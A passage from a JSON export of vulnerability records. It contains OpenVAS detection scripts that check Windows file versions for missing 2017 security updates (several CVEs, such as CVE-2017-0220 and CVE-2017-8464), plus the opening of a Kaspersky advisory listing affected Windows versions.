"2020-06-08T23:20:33", "description": "This host is missing an important security\n update according to Microsoft Security update KB4018821", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": 
"Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0220"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811119\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0220\");\n script_bugtraq_id(98111);\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:57:18 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Security update KB4018821\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists as the windows kernel\n improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited the\n vulnerability could obtain sensitive information to further compromise the\n user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018821\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Afd.sys\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19762\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19762\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24086\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24086\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\Afd.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:25:41", "description": "This host is missing an important security\n update according to Microsoft KB4018885.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": 
"OPENVAS:1361412562310811030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811030", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811030\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0175\");\n script_bugtraq_id(98110);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:16:48 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018885.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 
vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because the Windows kernel\n improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to sensitive information which can aid in further compromise of\n the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4018885\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0175\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\tcpip.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.0.6002.19763\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19763\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24086\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24086\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 
'File checked: ' + sysPath + \"\\drivers\\tcpip.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:20:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0190"], "description": "This host is missing an important security\n update according to Microsoft KB4019206.", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811027", "type": "openvas", "title": "Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811027\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0190\");\n script_bugtraq_id(98297);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 09:58:52 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4019206.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the way that\n the Windows Graphics Device Interface (GDI) handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to retrieve information from a targeted system. By itself, the information\n disclosure does not allow arbitrary code execution. However, it could allow\n arbitrary code to be run if the attacker uses it in combination with another\n vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019206\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0190\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:gdiVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Gdi32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:21:03", "description": "This host is missing an important security\n update according to Microsoft KB4019149.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2017-0077"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811029\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0077\");\n script_bugtraq_id(98114);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 10:56:24 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft 
KB4019149.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the way\n Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) handles certain calls\n and escapes to preclude improper memory mapping and prevent unintended elevation\n from user-mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to take control over the affected system and run processes in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019149\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0077\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Dxgkrnl.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"7.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 7.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse 
if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"7.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 7.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Dxgkrnl.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:55", "description": "This host is missing a critical security\n update according to Microsoft security update KB4022839.", "cvss3": {}, "published": "2017-06-16T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8464\", \"CVE-2017-8543\", \"CVE-2017-8552\");\n script_bugtraq_id(98818, 98824, 99035);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-16 16:41:25 +0530 (Fri, 16 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security update KB4022839.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error exists in 'Win32k' when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n\n - An error in the Windows Search which fails to handles objects in memory.\n\n - An error in .LNK file due to processing of shortcut LNK references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs.\n View, change, or delete data, or create new accounts with full user rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 
x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-ph/help/4022839\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.2.9200.22164\"))\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22164' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:47:14", "description": "Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8461", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8487", "CVE-2017-8552", 
"CVE-2017-0176"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108777", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108777\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-8543\", \"CVE-2017-8464\", \"CVE-2017-8461\", \"CVE-2017-8487\", \"CVE-2017-8552\", \"CVE-2017-0176\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)\");\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.\");\n\n script_tag(name:\"insight\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8. Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation. (Vulnerability ID: HWPSIRT-2017-06114,HWPSIRT-2017-06115,HWPSIRT-2017-06131,HWPSIRT-2017-06133,HWPSIRT-2017-06153 and HWPSIRT-2017-06154)The six vulnerabilities have been assigned six Common Vulnerabilities and Exposures (CVE) IDs: CVE-2017-0176, CVE-2017-8461, CVE-2017-8464, CVE-2017-8487, CVE-2017-8543 and CVE-2017-8552.Huawei has released software updates to fix these vulnerabilities. 
This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation.\");\n\n script_tag(name:\"affected\", value:\"AnyOffice versions V200R002C10\n\nN2000 Appliance versions V100R001C00\n\nOceanStor 18500 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor 18800 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor Backup Software versions V100R001C00\n\nSMC2.0 versions V100R003C10 V100R005C00 V500R002C00 V600R006C00\n\nSecospace AntiDDoS8000 versions V100R001C00\n\nSecospace AntiDDoS8160 versions V100R001C00SPC300\n\nUC Audio Recorder versions V100R001C01\n\nUMA versions V300R001C00\n\neLog versions V200R003C10\n\neSpace ECS versions V200R003C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170909-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:18:04", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2016 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) 
